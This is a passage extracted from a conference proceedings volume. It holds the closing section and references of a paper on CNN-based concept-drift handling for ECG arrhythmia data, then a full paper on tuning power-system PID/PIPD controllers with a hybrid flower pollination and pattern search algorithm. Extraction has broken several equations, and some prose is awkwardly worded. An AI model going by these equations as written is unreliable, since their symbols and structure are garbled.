this point, the learning procedure is worked using feed-forward and backpropagation
methods. A function log may be altered straight to a data stream structured upon the
features preferred in the earlier step. This step offers with determining the sample
masses for learning the variations in the features of footprints. Diverse circumstances
may be viewed as for producing such populations via the data stream.
(3) Validation and Prediction: Furthermore, QRS complex extraction will be
carried out depending on sparse vector comprising peaks as true and untrue signal
removal. The suggested algorithm is going to be developed and so analyzed real-time
ECG data or perhaps dataset. This algorithm can choose preprocessed data as a source
and then will be employed using CNN for processing. The data affirmation will be
done applying formulated CNN model. The arrhythmia dataset acceptance will be
performed by means of implementing time series and/or ECG image processing.
164 K. S. Desale and S. V. Shinde

Fig. 1 Proposed research methodology


Addressing Concept Drifts Using Deep Learning … 165

Proposed Algorithm: CNNCorazonPredict


Algorithms interacting by way of concept drift are actually involved with active
and passive versions. The proposed algorithm named “CNNCorazonPredict” (CCP)
is tailored as a passive procedure as it avoids issues just like missed or maybe false
diagnosed drifts; however, on the other side, the variation velocity is extremely
continuous pointing to expensive delays in the circumstance of unexpected drift.
Consequently, we further formulated CNN modeling to boost the processing speed
which can avoid delays. Proposed algorithm pseudocode is as below:
Algorithm 1: CNNCorazonPredict pseudo code
Input: arrhythmia dataset-ECG
Output: accuracy, sensitivity, specificity, Positive Prediction Value (PPV)
1 Initialize Data Log: Di & Component Array comp Arr [i]
2 for each i do
3 identify Q-R-S component from Di & store in array allComp[c]
4 for (c=0,allComp[],c++) do
5 Extract ‘R’ peak
6 Store ‘R’ peak value in array all R peak[]
7 carry Concatenation of Convolution Layer define Epoch size = 100

In the event that enhanced data are available, the conjecture model will be imple-
mented for recognition of forecasted heart conditions. In the case there is simply no
disorders prediction value, and consequently recurrent concept drift can be carried
out until model results in being prediction outcomes. For conjecture values, hyper-
parameters will be placed for absolute training of dataset. Furthermore, for training,
the validation evaluation can be executed to evaluate proposed system results with
existing information of outcomes.

References

1. Zenisek, J., Holzinger, F., & Affenzeller, M. (2019). Machine learning based concept drift
detection for predictive maintenance. Computers & Industrial Engineering, 137.
2. de Mello, R. F., et al. (2019). On learning guarantees to unsupervised concept drift detection
on data streams. Expert Systems with Applications, 117, 90–102.
3. Cejnek, M., & Bukovsky, I. (2018). Concept drift robust adaptive novelty detection for data
streams. Neurocomputing, 309, https://doi.org/10.1016/j.neucom.2018.04.069.
4. Maria De Marsico, A. P., & Ricciardi, S. (2016). Iris recognition through machine learning
techniques: A survey. Pattern Recognition Letters, 82, (Part 2), 106–115. ISSN 0167-8655.
https://doi.org/10.1016/j.patrec.2016.02.001.
5. Demšar, J., & Bosnić, Z. (2018). Detecting concept drift in data streams using model explana-
tion. Expert Systems with Applications, 92, 546–559.
6. Lu, Y., Cheung, Y.-M., & Tang, Y. Y. (2019). Adaptive chunk-based dynamic weighted majority
for imbalanced data streams with concept drift. IEEE Transactions on Neural Networks and
Learning Systems.
166 K. S. Desale and S. V. Shinde

7. Lin, L., et al. (2019). Concept drift based multi-dimensional data streams sampling method. In
Pacific-Asia Conference on Knowledge Discovery and Data Mining. (Vol. 11439, pp. 331–342).
LNAI.
8. Roveri, M. (2019). Learning discrete-time Markov chains under concept drift. IEEE Transac-
tions on Neural Networks and Learning Systems, 30(9), 2570–2582. https://doi.org/10.1109/
TNNLS.2018.2886956.
9. Ryan, S., Corizzo, R., Kiringa, I., & Japkowicz, N. (2019). Deep learning versus conventional
learning in data streams with concept drifts. In 18th IEEE International Conference On Machine
Learning And Applications (ICMLA) (pp. 1306–1313). Boca Raton, FL, USA. https://doi.org/
10.1109/ICMLA.2019.00213.
10. Liu, A., Lu, J., & Zhang, G. (2020). Diverse instance-weighting ensemble based on region
drift disagreement for concept drift adaptation. IEEE Transactions on Neural Networks and
Learning Systems,. https://doi.org/10.1109/TNNLS.2020.2978523.
11. Yang, Z., Al-Dahidi, S., Baraldi, P., Zio, E., & Montelatici, L. (2020). A novel concept drift
detection method for incremental learning in nonstationary environments. IEEE Transactions
on Neural Networks and Learning Systems, 31(1), 309–320. https://doi.org/10.1109/TNNLS.
2019.2900956.
12. Iwashita, A. S., de Albuquerque, V. H. C., & Papa, J. P. (2019). Learning concept drift with
ensembles of optimum-path forest-based classifiers. Future Generation Computer Systems, 95,
198–211.
13. Zhou, X., Lo, Faro W., Zhang, X., & Arvapally, R. S. (2019). A Framework to Monitor Machine
Learning Systems Using Concept Drift Detection. In: Abramowicz W., Corchuelo R. (eds)
Business Information Systems. BIS,. (2019). Lecture Notes in Business Information Processing
(Vol. 353). Cham: Springer.
14. Song, Y., Lu, J., Lu, H., & Zhang, G. (2020). Fuzzy clustering-based adaptive regression for
drifting data streams. IEEE Transactions on Fuzzy Systems, 28(3), 544–557. https://doi.org/
10.1109/TFUZZ.2019.2910714.
15. Rutkowska, D., & Rutkowski, L. (2019). On the hermite series-based generalized regression
neural networks for stream data mining. In T. Gedeon, K. Wong, M. Lee (Eds.), Neural Infor-
mation Processing. ICONIP. (2019). Lecture Notes in Computer Science (Vol. 11955). Cham:
Springer.
16. Abdualrhman, M. A. A., & Padma, M. C. (2020). Deterministic Concept drift detection in
ensemble classifier based data stream classification process. IJGHPC, 11(1), 29–48. https://
doi.org/10.4018/IJGHPC.2019010103.
17. Abdualrhman, M. A. A., & Padma, M. C. (2019). CD2A: Concept drift detection approach
toward imbalanced data stream. In V. Sridhar, M. Padma, & K. Rao (Eds.), Emerging Research
in Electronics, Computer Science and Technology Lecture Notes in Electrical Engineering
(Vol. 545). Singapore: Springer.
18. McConville, R., et al. (2018). Online heart rate prediction using acceleration from a wrist worn
wearable. arXiv:1807.04667.
19. Zhang, L., Zhao, J., & Li, W. Online and unsupervised anomaly detection for streaming data
using an array of sliding windows and PDDs. In IEEE Transactions on Cybernetics. https://
doi.org/10.1109/TCYB.2019.2935066.
20. Yu, S., et al. (2019). Concept drift detection and adaptation with hierarchical hypothesis testing.
arXiv:1707.07821.
21. Albuquerque, R. A. S., Costa, A. F. J., Miranda dos Santos, E., Sabourin, R., & Giusti, R.
(2019). A decision-based dynamic ensemble selection method for concept drift 2019. In: IEEE
31st International Conference on Tools with Artificial Intelligence (ICTAI) (pp. 1132–1139)
Portland, OR, USA. https://doi.org/10.1109/ICTAI.2019.00158.
22. Li, Z., Huang, W., Xiong, Y., Ren, S., & Zhu, T. (2020). Incremental learning imbalanced
data streams with concept drift: The dynamic updated ensemble algorithm. Knowledge-Based
Systems, 195.
23. Raj, S., Ray, K. C., & Shankar, O. (2018). Development of robust, fast and efficient QRS
complex detector: A methodological review. Australasian Physical & Engineering Sciences in
Medicine, 41, 581–600. https://doi.org/10.1007/s13246-018-0670-7.
Addressing Concept Drifts Using Deep Learning … 167

24. Jain, S., Kumar, A., & Bajaj, V. (2016). Technique for QRS complex detection using particle
swarm optimization. IET Science, Measurement & Technology, 10(6), 626–636.
25. Venkatesan, C., Karthigaikumar, P., Paul, A., Satheeskumaran, S., & Kumar, R. (2018). ECG
signal preprocessing and SVM classifier-based abnormality detection in remote healthcare
applications. IEEE Access, 6, 9767–9773. https://doi.org/10.1109/ACCESS.2018.2794346.
26. Saurav, S., Malhotra, P., Vishnu, T. V., Gugulothu, N., Vig, L., Agarwal, P., & Shroff, G. (2018).
Online anomaly detection with concept drift adaptation using recurrent neural networks. In Pro-
ceedings of the ACM India Joint International Conference on Data Science and Management
of Data (CoDS-COMAD ’18). (pp. 78–87). New York, NY, USA.: Association for Computing
Machinery. https://doi.org/10.1145/3152494.3152501.
27. Steinberg, C., Philippon, F., Sanchez, M., et al. (2019). A novel wearable device for continuous
ambulatory ECG recording: proof of concept and assessment of signal quality. Biosensors
(Basel), 9(1):17. Published 2019 Jan 21. https://doi.org/10.3390/bios9010017.
28. Zuo, J., Zeitouni, K., & Taher, Y. (2019). ISETS: Incremental Shapelet Extraction from Time
Series Stream.
29. Sahmoud, S., & Topcuoglu, H. R. (2020). A general framework based on dynamic multi-
objective evolutionary algorithms for handling feature drifts on data streams. Future Generation
Computer Systems, 102, 42–52.
30. Duda, P., Jaworski, M., Cader, A., & Wang, L. (2020). On training deep neural networks using
a streaming approach. Journal of Artificial Intelligence and Soft Computing Research, 10(1),
15–26. https://doi.org/10.2478/jaiscr-2020-0002.
31. Fedotov, A. (2019). The concept of a new generation of electrocardiogram simulators. Mea-
surement Techniques, 61, https://doi.org/10.1007/s11018-019-01576-3.
32. Anugirba, K. (2019). ECG QRS complex detector for BSN using multiscale mathematical
morphology. Journal of the Gujarat Research Society, 21(14), 655–662.
33. Liu, C., et al. (2019). Signal quality assessment and lightweight QRS detection for wearable
ECG smartVest system. IEEE Internet of Things Journal, 6(2), 1363–1374. https://doi.org/10.
1109/JIOT.2018.2844090.
34. Erdenebayar, U., Kim, Y. J., Park, J.-U., Joo, E. Y., & Lee, K.-J. (2019). Deep learning
approaches for automatic detection of sleep apnea events from an electrocardiogram. Com-
puter Methods and Programs in Biomedicine, 180.
Tailoring the Controller Parameters
Using Hybrid Flower Pollination
Algorithm for Performance
Enhancement of Multisource Two Area
Power System

Megha Khatri, Pankaj Dahiya, and S. Hareesh Reddy

Abstract The stability of the multisource interactive power generation system can
be achieved by accurately tuning the controller parameters, which regulates the
power flow in the system. This article is dedicated to a novel hybrid flower pollina-
tion algorithm applicable to regulate the proportional-integral-derivative (PID) and
proportional-integral cascaded with proportional-derivative (PIPD) controller struc-
tures integrated in the interlinked multisource two area AC-DC power systems. The
supremacy of the projected algorithm is investigated with respect to the range of
techniques discussed in the literature. The comparison parameters taken into consid-
eration are variations in tie-line power, area frequency along with the reduction in
controller errors to achieve better system stability.

Keywords Hybrid flower pollination algorithm · PID controller · PIPD


controller · Multisource two area systems · AC-DC interconnected power system

1 Introduction

Electrical power generated from diverse sources like hydro, thermal, gas, solar and
wind power plants serve the consumers. However, it is a matter of fact that the
interconnection of these (AC-DC) power plants reduces the quality of power, stability
and consistency of the power system. With a view to overcome power crisis, the
power flow controller of the interlinked systems must be optimally controlled to
limit the losses in the system. Also, it is essential to ensure that the interlinked
system is working on the nominal values of system parameters such as voltage,
phase and frequency for its successful operation. It is also important to quantify the

M. Khatri (B) · S. H. Reddy


School of Electronics and Electrical Engineering, Lovely Professional University, Jalandhar,
Punjab 144411, India
e-mail: megha.25035@lpu.co.in
P. Dahiya
Department of Electronics and Communication Engineering, Delhi Technological University,
New Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 169
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_14
170 M. Khatri et al.

power distribution to satisfy the load demand under balanced conditions. However,
frequent change in power requirement by load affects the area frequency and power
in the common line connecting multiple energy sources areas.
Hence, the intention here is to keep the frequency and power of the interdependent
system within the limits and make efforts to diminish the area control error to achieve
stability. The load frequency adjustment of the single/two/multiple area networks
various studies have been developed and implemented from the last few decades.
Recently, the studies are extended to the implementation of bio-inspirited algo-
rithms for the optimization of controller parameters. Some of the popular algorithms
presented by the researchers to improve the controller response are cuckoo search
algorithm (CSA) employed for the two area interdependent energy resources [1]
firefly algorithm (FA) utilized for the multi-area systems [2], genetic algorithm (GA)
for the automatic generation control system [3], practical swarm optimization (PSO)
[4], Teaching–learning-based optimization algorithm [5, 6], bacterial foraging algo-
rithm (BF) [7], artificial immune system (AIS) [8], flower pollination algorithm
(FPA) [9, 10], etc. It has been observed that due to nonlinearities/nonlinear loads the
system response shatters in terms of parameters such as high peak overshoot, large
settling time, more damping oscillations.
Thus, this paper contributes to the manipulating the PID and PIPD controller
variables for the multisource connected areas. The controller gains are refined with
proffered algorithm under varying load conditions, and its performance analysis is
compared to the recently published algorithms [11, 12].
The work is structured as: Sect. 2 illustrates the mathematical blueprint of the
multisource two area interdependent system along with its parameters. Section 3
presents the enhanced version of PID/PIPD controllers whose gains optimization
using hybrid flower pollination algorithm. Afterward a comparison of the proposed
algorithm is carried out and its performance is observed. In Sect. 4, the conclusion
about the proffer algorithm is drawn.

2 System Under Investigation

The system under examination is an interdependent multisource AC-DC system


encompasses hydro, thermal and gas power production units as AC power sources
and solar as DC power source as shown in Fig. 1. The control errors of multisource
systems are U H1 , U H2 ; U T1 , U T2 ; and U G1 , U G2, respectively, while the area control
error is CE1 and CE2 as mentioned. The governor speed regulation parameters of
sources are RH1 , RH2 , RT1 , RT2 , RG1 , RG2 , and B1 , B2 are the frequency bias param-
eters. The frequency variations f1 , f2 in Hz the variations in line power Ptie in
per unit of connected two areas in case of load variations may be distinguished.
The involved variables of hydro, thermal and gas power producing units are K H ,
K T and K G , where the time constant (in seconds) of thermal speed governors is T G1
T G2 , steam turbines are T T1 T T2 , reheat time constant T R1 , T R2 professed initial
time of water inside penstock of hydro unit is T W , the servo time constant of hydro
Tailoring the Controller Parameters … 171

Fig. 1 Two area multi. Source AC-DC power system

plant speed governor is T GH1 T GH2 , turbine speed governor reset time is T RS1 , T RS2 ,
transient droop time constant of the hydro turbine is T RH1 T RH2 , the lead time constant
of the gas turbine speed governor is X C , the lag time constant of gas speed turbine
is Y C , the gas turbine valve position is cg , the gas turbine valve position constant is
bg , gas turbine combustion reaction time hindrance T CR , the discharge volume-time
constant of gas turbine compressor is T CD , power system gain is K PS , power system
time constant is T PS , the gradational load change is PD1 PD2 . The DC power
source has the gain K DS , the power system time constant T DS .
An area control error of the presented system is given below

CE1,2 = B1,2 ∗  f 1,2 + Ptie (1)


172 M. Khatri et al.

Each component of the area has been analyzed in frequency domain and presented
in transfer function form. The thermal speed governing system has two inputs: the
reference U T1.2 and f 1.2 and the output Eq. (2) obtained is
 
1
PT1.2 = UT1.2 − ∗  f 1.2 (2)
RT1.2

Similarly, for hydro and gas power units, the output obtained is Eqs. (3) and (4),
respectively.
 
1
PH1.2 = UH1.2 − ∗  f 1.2 (3)
RH1.2
 
1
PG1.2 = UG1.2 − ∗  f 1.2 (4)
RG1.2

The incremental frequency change of the system is given in Eq. (5)

 f 1.2 = G P1.2 (s)[(PH1.2 + PT1.2 + PG1.2 + PDS1.2 ) − PD1.2 ]; (5)

where G P1.2 (s) = 1+sT


K PS1.2
PS1.2
.
The performance of the complete system can be judged on system retaliation
parameters like peak undershoot, overshoot, settling time, errors. The controller
parameters are regulated with respect to the specified error [13]. Thus, the objective
function integral time multiply absolute error (ITAE) is chosen to revive the PID/PIPD
gains, which depicts the variations and helps in settling the system faster than the other
methods presented in the literature [14]. Therefore, as a better objective function,
ITAE is presented in Eq. (6)

tsim
CE1.2 = ITAE = ∫ (| f 1 | + | f 2 | + |Ptie |) ∗ t ∗ dt + Ptie (6)
0

The transfer function model of multisource interconnected AC–DC tie-lines


system involves thermal, hydro, gas, solar power production units in Fig. 1. The
controller outputs for each unit of power plant U T , U H and U G with PID parameters,
i.e., proportional (K p1 ), Integral (K I1 ) and derivative (K d1 ) constants, respectively.
Moreover, the PIPD structure with K p1 K I1 K d1 with added control parameter, i.e.,
proportional constant (K p2 ) is expressed in below Eqs. (7)–(9).
For the optimization of these parameters, hybrid flower pollination algorithm
with pattern search (hFPA-PS) proffered for interconnected AC units and AC-DC
tied power units.

dCE1
UH = K P1 CE1 + K I1 ∫ CE1 + K P2 CE1 + K d1 (7)
dt
Tailoring the Controller Parameters … 173

dCE1
UT = K P1 CE1 + K I1 ∫ CE1 + K P2 CE1 + K d1 (8)
dt
dCE1
UG = K P1 CE1 + K I1 ∫ CE1 + K P2 CE1 + K d1 (9)
dt
For the multi-objective optimization problems, the flower pollination algorithm
rules formulated in [14]. The plants are flourishing their species through pollination
by means of transporting pollens from one to another flower for reproduction. If the
pollinators are birds, animals, insects the pollination is biotic, else the pollinators
can be abiotic such as wind, water [15].
The biotic pollinators can move to long distances come under the category of
global pollination shows Lévy flight behavior [16] and mathematically formulated
using Lévy distribution to get the random solutions using the conventional flower
pollination algorithm [17].
On the other hand, the pollination through the abiotic pollinators called local polli-
nation can be mathematically formulated for effective convergence of solutions using
pattern search algorithm (PS) [18]. To make a decision for the pollination is global
or local, the switch probability (ρ) values fall in the range 0–1. The mathematical
expression of the global pollination using Lévy flight behavior is
 
X it+1 = X i (t) + γ L(ρ) G ∗ − X it (t) (10)

where X it = pollen “i” at iteration t,


G* = present best solution of the selected population,
X it+1 = solution for iteration t + 1.
γ = scaling factor update the step size.
L(ρ) = Lévy distribution [16, 17] presented below

ρτ (ρ) sin(πρ/2) 1
L∼ (11)
π s 1+ρ

where τ (ρ) = typical gamma function, while the distribution is applicable to outsized
steps S > 0. When the arbitrary number is lower than the switching (p), the local
pollination transpires mathematically shown as
 
X it+1 = X i (t) X tj (t) − X kt (t) (12)

where X tj and X kt are pollen from unlike flowers of the similar species that presents
the outcome consistency in the event of local pollination. The step size can be drawn
using Eq. (13). Following the Gaussian distribution, A and B are the arbitrary numbers
and the samples can be gathered from a typical Gaussian distribution function with
174 M. Khatri et al.

variance σ 2 and zero mean value.


A  
S= 1 , A ∼ n 0, σ 2 & B ∼ n(0, 1) (13)
B p

The variance is calculated as

   1/ρ
τ (1 + ρ) sin πρ 2
σ2 =   . (ρ−1)/2 (14)
ρτ 1+ρ2
2

The flowers which are closer have fair chances to be fertilized due to local polli-
nation while the flowers which are likely to be pollinated globally. Therefore, the
switch probability is used for switching among local and global pollination which is
to some extent partial toward local pollination [19]. The pattern search algorithm is
a derivative-free method to resolve the issues related to parameters upgradation. It is
based on the computation of a sequence of points, which probably approach to the
optimal solution but creates a mesh.
The mesh is a collection of points around the starting points defined by FPA. Then,
the chosen point, i.e., current best is multiplied to the scalar set off vector known as
pattern for creating the mesh, and a paramount identified objective function turns out
to be the present point for subsequent iteration. For the first iteration, the mesh volume
is initiated with scalar = 1, and then, the direction vectors are initiated [20, 21].
The FPA decides the initial point X 0 , and the direction vectors are appended
to compute the objective function whose value is computed for the smallest
possible values obtained than the initial point X 0 . However, if the objective function
successfully reaches a smaller value, then the mesh point becomes X 1 [22, 23].
Therefore, based upon the success rate of the smallest objective function, in the
second iteration, the mesh size is multiplied with higher and lower multiplier factors
to obtain the optimal solution. Thus, the feedback gain is optimized in the presented
work.

3 Testaments of Proposed Algorithm

The controller gains K p , K I and K d of PID and K p1 , K I1, K d1 and K p2 of PIPD for the
multisource (6 sources) two area network are given in Table 1. Here, the system is
interlinked to through the AC tie-line only. The system parameters considered for the
optimized operation of controllers using hybrid flower pollination algorithm where
the levy’s distribution factor taken is 1.5, iterations 50 and the switching probability
0.8 to optimize the controller parameters.
The simulations are carried with the mentioned parameters in Table 1 of
controllers. The algorithms implemented for the controller tuning are differential
evolution algorithm (DE) based PID, hybrid stochastic fractal search combined
Tailoring the Controller Parameters … 175

Table 1 PID controller gains of multisource two area AC tie-line units


Controller Parameters Thermal Hydro Gas
PID Kp 2.6791 1.9220 0.4782
KI 2.7396 −0.0495 2.2118
Kd 2.6978 0.9009 0.7612
PIPD K p1 2.8337 1.5809 0.5525
K I1 1.2939 2.4750 2.4382
K p2 1.3327 −0.8609 2.0637
K d1 1.2421 0.8583 1.0752

pattern search technique (hSFS:PS) based PID, hybrid flower pollination algorithm
combined pattern search (hFPA:PS) method based PID and PIPD [20–22].
The performance comparison of the mentioned algorithms is done on the bases of
following indices, i.e., objective function ITAE, states of system frequencies (f 1,2 ),
i.e., peak overshoot (PO), peak undershoot (PU) and settling time (ST) for areas 1
and 2, respectively, with connected line power is represented in Table 3.
The obtained results of the proposed algorithm hFPA:PS-PIPD are validated
by observing the variations in the frequency which is decreased significantly as
compared to the other algorithms. It is also evident that the ITAE is minimized, and
thus, the system stability and reliability is achieved.
Moreover, the response of the system can be observed graphically as shown in
Fig. 2, the change in a rea1 frequency (f 1 ). With the proposed algorithm for PID
and PIPD controller, the system frequency achieves the steady state at the faster
rate compared to discussed methods. Figure 3 represents the variations in area 2
frequency (f 2 ), and the response of variation in tie-line power (Ptie ) is in Fig. 4.
By using the proffered method, losses can be reduced drastically and the system can
be balanced in minimum time.

0.01

-0.01

-0.02

-0.03

-0.04
DE:PID
-0.05 hSFS-PS:PID
Proposed:PID
Proposed:PIPD
-0.06
0 5 10 15 20 25 30 35 40
Time (s)

Fig. 2 Comparison of frequency variations in area-1 incorporated with PID and PIPD controller
176 M. Khatri et al.

0.01

-0.01

-0.02

-0.03

DE:PID
-0.04 hSFS-PS:PID
Proposed:PID
Proposed:PIPD
-0.05
0 5 10 15 20 25 30 35 40
Time (s)

Fig. 3 Comparison of frequency variations in area-2 incorporated with PID and PIPD controller

-3
10
2

-2

-4

-6

DE:PID
-8
hSFS-PS:PID
Proposed:PID
Proposed:PIPD
-10
0 5 10 15 20 25 30 35 40
Time (s)

Fig. 4 Comparative responses of the variations in tie-line power

Hence, the overall response of the proposed method for both the controllers is
superior. Table 2 illustrates the parameters variations associated with proposed hFPA-
PS:PIPD with possible combinations in an interdependent multisource power system
connected through an AC tie-line. It is depicted from Table 2, so the ITAE is mini-
mized along with control on area frequency and power flow in the connected line.
The settling time is also minimized with the application of proffered algorithm for
PID and PIPD controller structures.
The modified gains of PID and PIPD are presented in Table 3 of the connected
AC-DC line. The performance indices comparison is done for the considered system
in Table 4 between differential evolution algorithm based DE: I, DE: PI, DE: PID with
proposed hFPA-PS:I, hFPA-PS:PI, hFPA-PS:PID and hFPA-PS:PIPD. The following
indices, i.e., ITAE, PO (f 1,2 ), P U (f 1,2 ) and ST of areas 1, area 2, and power
variations in connected line are presented to analyze the AC-DC interdependent
system via tie-line. Again, the performance of hFPA-PS:PIPD is found better in terms
of minimizing all these parameters with respect to other combinations. Figure 5a and
b the changes in frequency can be perceived and depicted that the area frequencies
in case of AC–DC tie-line takes more time to settle down than the system only with
Tailoring the Controller Parameters … 177

Table 2 Performance indicators of system with AC tie-line


Parameters hFPA-PS:PIPD hFPA-PS:PID DE:PID[11] hSFS-PS:PID [12]
J(ITAE) 0.2357 0.2956 1.2014 0.3797
PU(f 1 ) −0.0270 −0.0312 −0.0532 −0.0428
(Hz)
PU(f 2) −0.0130 −0.0183 −0.0444 −0.0286
(Hz)
PU(Ptie ) −0.0036 −0.0049 −0.0096 −0.0068
(MW)
PO(f 1 ) 0.0013 0.0063 0.0041 0.0082
(Hz)
PO(f 2 ) 5.0724 × 10–05 0.0039 0.0016 0.0045
(Hz)
PO(Ptie ) 3.9864 × 10–05 4.8537 × 10–04 3.8701 × 10–04 5.0456 × 10–04
(MW)
ST (f 1 ) (s) 6.3354 6.8192 13.4735 9.4606
ST (f 2 ) (s) 4.2163 12.3367 8.5014 11.4680
ST (Ptie ) 6.9590 15.6769 32.3995 17.4044
(s)

Table 3 Controller gains of multisource two area AC-DC tie-line power


Controller Parameters Thermal Hydro Gas
I KI 2.4150 0.5517 4.4726
PI KP 2.7582 0.3581 2.4522
KI 3.2027 2.2079 2.0923
PID KP 2.1671 2.5590 1.8428
KI 2.5180 0.3581 3.6550
KD 0.5056 1.9433 0.6924
PIPD K P1 0.7888 0.2938 0.4869
K I1 2.7662 0.4655 2.0637
K P2 2.7357 0.8622 3.1217
K D1 2.9701 −0.2398 1.6625

AC tie-line power in Fig. 5c. However, the performance of the proffered algorithm
is appreciable because of system stability and reliability.
178

Table 4 Performance indices with AC and DC tie-line


Parameters hFPA-PS:PIPD hFPA-PS:PID DE:PID hFPA-PS:PI DE:PI hFPA-PS:I DE:I
J(ITAE) 0.0994 0.2842 0.4485 0.3069 0.5592 0.3521 0.7461
PU(f 1) (Hz) −0.0167 −0.0282 −0.0235 −0.0243 −0.0254 −0.0256 −0.0256
PU(f 2) (Hz) −0.0031 −0.0064 −0.0051 −0.0048 −0.0056 −0.0056 −0.0061
PU(Ptie ) (MW) −0.0015 −0.0033 −0.0036 −0.0031 −0.0043 −0.0041 −0.0049
PO(f 1) (Hz) 7.8264 × 10–04 0.0042 7.6573 × 10–04 0.0012 0.0016 0.0029 0.0023
PO(f 2) (Hz) 4.7776 × 10–04 8.9423 × 10–04 0.0011 0.0012 0.0017 0.0020 0.0025
PO(Ptie ) (MW) 2.9272 × 10–04 7.5261 × 10–04 0.0011 9.5510 × 10–04 0.0017 0.0018 0.0026
ST (f 1) (s) 6.2999 7.1381 8.3945 8.0175 18.7322 14.5909 20.3814
ST (f 2) (s) 16.3699 19.9672 24.4975 20.1901 25.3626 20.5025 25.9861
ST (Ptie ) (s) 14.2893 13.8181 15.4232 13.2297 22.4630 18.5849 25.4340
M. Khatri et al.
Tailoring the Controller Parameters … 179

0.005

-0.005

-0.01

-0.015
Proposed:I
DE:I
-0.02
Proposed:PI
DE:PI
-0.025 Proposed:PID
DE:PID
Proposed:PIPD
-0.03
0 5 10 15 20 25 30 35 40
Time (s)

(a)
-3
10

-2

Proposed:I
DE:I
-4
Proposed:PI
DE:PI
Proposed:PID
-6 DE:PID
Proposed:PIPD

0 5 10 15 20 25 30 35 40
Time (s)

(b)
-3
10
3

-1

Proposed:I
-2
DE:I
Proposed:PI
-3
DE:PI
Proposed:PID
-4 DE:PID
Proposed:PIPD
-5
0 5 10 15 20 25 30 35 40
Time (s)

(c)

Fig. 5 Dynamic responses Frequency variations a area-1, b area-2, c Power variations in connected
areas
180 M. Khatri et al.

4 Conclusions

The flower pollination algorithm gained popularity due to global accomplishment,


and the pattern search technique is beneficial for the local search. Therefore, an
attempt is made to combine the algorithms to obtain the optimal solution for common
problems. The two areas multisource system is considered, where areas are connected
through only AC and AC-DC connected power lines, respectively. The stability in
tie-line power can also be realized from Figs. 4 and 5c. The frequency response of
considered system is presented in Figs. 2, 4, 5(a) and 5(b) discretely proves that the
application of proposed algorithm on PIPD controller with proposed algorithm out
performed compared to the others techniques. The error (ITAE) objective function
obtained is also minimum, i.e., 0.2357 and 0.0994 with the implementation of hFPA-
PS:PIPD in the considered power system as presented in Tables 3 and 5, respectively.
The discussed work can be extended to complicated conventional and rationalized
interdependent systems which can be integrated with available renewable energy
resources, electrical vehicle integration with grid and the impact of energy storage
devices on interdependent systems.

References

1. Abdelaziz, A. Y., & Ali, E. S. (2015). Cuckoo search algorithm based load frequency controller
design for nonlinear interconnected power system. International Journal of Electrical Power
& Energy Systems, 73, 632–643.
2. Abd-Elazim, S. M., & Ali, E. S. (2018). Load frequency controller design of a two-area system
composing of PV grid and thermal generator via firefly algorithm. Neural Computing and
Applications, 30, 607–616.
3. Al-Othman, A. K., Ahmed, N. A., Al Sharidah, M. E., & Al Mekhaizim, H. A. (2013). A hybrid
real coded genetic algorithm–pattern search approach for selective harmonic elimination of
PWM AC/AC voltage controller. International Journal of Electrical Power & Energy Systems,
44, 123–133.
4. Panda, S., Mohanty, B., & Hota, P. K. (2013). Hybrid BFOA–PSO algorithm for auto-
matic generation control of linear and nonlinear interconnected power systems. Applied Soft
Computing, 13, 4718–4730.
5. Mohanty, B. (2015). TLBO optimized sliding mode controller for multi-area multi-source
nonlinear interconnected AGC system. International Journal of Electrical Power & Energy
Systems, 73, 872–881.
6. Rao, R. V., Savsani, V. J., & Akharia, D. P. (2012). Teaching–learning-based optimization:
an optimization method for continuous non-linear large scale problems. Information Sciences,
183, 1–15.
7. Ali, E. S., & Abd-Elazim, S. M. (2011). Bacteria foraging optimization algorithm based load
frequency controller for interconnected power system. International Journal of Electrical
Power & Energy Systems, 33, 633–638.
8. Zhong, Y., & Zhang, L. (2011). An adaptive artificial immune network for supervised classi-
fication of multi-/hyper spectral remote sensing imagery. IEEE Transactions on Geo-science
and Remote Sensing, 50, 894–909.
9. Yang, X. S., Karamanoglu, M., & He, X. (2013). Multi-objective flower algorithm for
optimization. Procedia Computer Science, 18, 861–868.
Tailoring the Controller Parameters … 181

10. Draa, A. (2015). On the performances of the flower pollination algorithm–qualitative and
quantitative analyses. Applied Soft Computing, 34, 349–371.
11. Mohanty, B., Panda, S., & Hota, P. K. (2014). Controller parameters tuning of differential
evolution algorithm and its application to load frequency control of multi-source power system.
International Journal of Electrical Power & Energy Systems, 54, 77–85.
12. Padhy, S., & Panda, S. (2017). A hybrid stochastic fractal search and pattern search technique
based cascade PI-PD controller for automatic generation control of multi-source power systems
in presence of plug in electric vehicles. CAAI Transactions on Intelligence Technology, 2, 12–25.
13. Khan, Z. A., Zafar, A., Javaid, S., Aslam, S., Rahim, M. H., Javaid, N. (2019). Hybrid
meta-heuristic optimization based home energy management system in smart grid. Journal
of Ambient Intelligence and Humanized Computing, 1–17.
14. Alyasseri, Z. A. A., Khader, A. T., Al-Betar, M. A., Awadallah, M. A., & Yang, X. S. (2018).
Variants of the flower pollination algorithm: A review. Nature-inspired algorithms and applied
optimization (Vol. 744, pp. 91–118). Cham: Springer.
15. Abdel-Raouf, O., & Abdel-Baset, M. (2014). A new hybrid flower pollination algorithm
for solving constrained global optimization problems. International Journal of Applied
Operational Research-An Open Access Journal, 4, 1–13.
16. Pavlyukevich, I. (2007). Lévy flights, non-local search and simulated annealing. Journal of
Computational Physics, 226, 1830–1844.
17. Sayed, S. A. F., Nabil, E., & Badr, A. (2016). A binary clonal flower pollination algorithm for
feature selection. Pattern Recognition Letters, 77, 21–27.
18. Abdel-Baset, M., & Hezam, I. (2016). A hybrid flower pollination algorithm for engineering
optimization problems. International Journal of Computer Applications, 140, 10–23.
19. Mahata, S., Saha, S. K., Kar, R., & Mandal, D. (2018). Optimal design of wideband digital
integrators and differentiators using hybrid flower pollination algorithm. Soft Computing, 22,
3757–3783.
20. Mohanty, B. (2020). Hybrid flower pollination and pattern search algorithm optimized sliding
mode controller for deregulated AGC system. Journal of Ambient Intelligence and Humanized
Computing, 11, 763–776.
21. Abdel-Basset, M., & Shawky, L. A. (2019). Flower pollination algorithm: A comprehensive
review. Artificial Intelligence Review, 52, 2533–2557.
22. Alweshah, M., Qadoura, M. A., Hammouri, A. I., Azmi M. S., & AlKhalaileh, S. (2020). Flower
pollination algorithm for solving classification problems. International Journal Advance Soft
Computer Application, 12
